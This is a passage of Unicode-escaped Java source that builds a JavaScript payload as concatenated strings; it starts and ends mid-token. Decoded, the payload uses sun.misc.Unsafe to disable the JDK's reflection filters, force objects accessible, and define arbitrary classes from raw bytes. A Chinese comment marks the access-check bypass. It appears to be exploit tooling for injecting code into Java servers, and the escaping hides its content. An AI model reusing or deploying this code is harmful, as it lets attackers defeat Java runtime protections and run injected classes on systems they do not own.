u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0063\u006c\u0061\u007a\u007a\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0063\u006c\u0061\u007a\u007a\u002c\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u006f\u0062\u006a\u0065\u0063\u0074\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0062\u0079\u0070\u0061\u0073\u0073\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0046\u0069\u006c\u0074\u0065\u0072\u0028\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0064\u006b\u002e\u0069\u006e\u0074\u0065\u0072\u006e\u0061\u006c\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0065\u0072\u0072\u006f\u0072\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u0073\u0073\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0052\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u0041\u0073\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u005c\u0022\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u002e\u0063\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0072\u0065\u0061\u0064\u0041\u006c\u006c\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u0042\u0075\u0066\u0066\u0065\u0072\u002c\u0020\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u002e\u0067\u0065\u0074\u0054\u0079\u0070\u0065\u0028\u0029\u002e\u0069\u0073\u0041\u0073\u0073\u0069\u0067\u006e\u0061\u0062\u006c\u0065\u0046\u0072\u006f\u006d\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u0029\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0073\u0074\u0061\u0074\u0069\u0063\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072\u0028\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u002e\u0067\u0065\u0074\u0054\u0079\u0070\u0065\u0028\u0029\u002e\u0069\u0073\u0041\u0073\u0073\u0069\u0067\u006e\u0061\u0062\u006c\u0065\u0046\u0072\u006f\u006d\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u0029\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0073\u0074\u0061\u0074\u0069\u0063\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072\u0028\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u006c\u0061\u0073\u0073\u0043\u0061\u0063\u0068\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0061\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u006f\u0066\u0066\u0073\u0065\u0074\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u006f\u0062\u006a\u0065\u0063\u0074\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0046\u0069\u0065\u006c\u0064\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u0042\u006f\u006f\u006c\u0065\u0061\u006e\u0028\u0061\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u002c\u0020\u006f\u0066\u0066\u0073\u0065\u0074\u002c\u0020\u0074\u0072\u0075\u0065\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0079\u0074\u0065\u0073\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u006e\u0075\u006c\u006c\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0055\u0052\u004c\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0072\u0072\u0061\u0079\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0055\u0052\u004c\u005c\u0022\u0029\u002c\u0020\u0030\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u005c\u0022\u002e\u005c\u0022\u0029\u005b\u0030\u005d\u0020\u003e\u003d\u0020\u0031\u0031\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0079\u0070\u0061\u0073\u0073\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0046\u0069\u006c\u0074\u0065\u0072\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u005c\u0022\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u005b\u0042\u005c\u0022\u0029\u002c\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u002e\u0054\u0059\u0050\u0045\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u002e\u0054\u0059\u0050\u0045\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u002f\u002f\u0020\u7ed5\u8fc7\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0020\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002c\u0020\u0030\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0065\u006c\u0073\u0065\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0070\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0050\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0043\u006f\u0064\u0065\u0053\u006f\u0075\u0072\u0063\u0065\u0028\u006e\u0075\u006c\u006c\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0072\u0072\u0061\u0079\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0063\u0065\u0072\u0074\u002e\u0043\u0065\u0072\u0074\u0069\u0066\u0069\u0063\u0061\u0074\u0065\u005c\u0022\u0029\u002c\u0020\u0030\u0029\u0029\u002c\u0020\u006e\u0075\u006c\u006c\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u005b\u005d\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u006e\u0075\u006c\u006c\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002c\u0020\u0030\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u0070\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\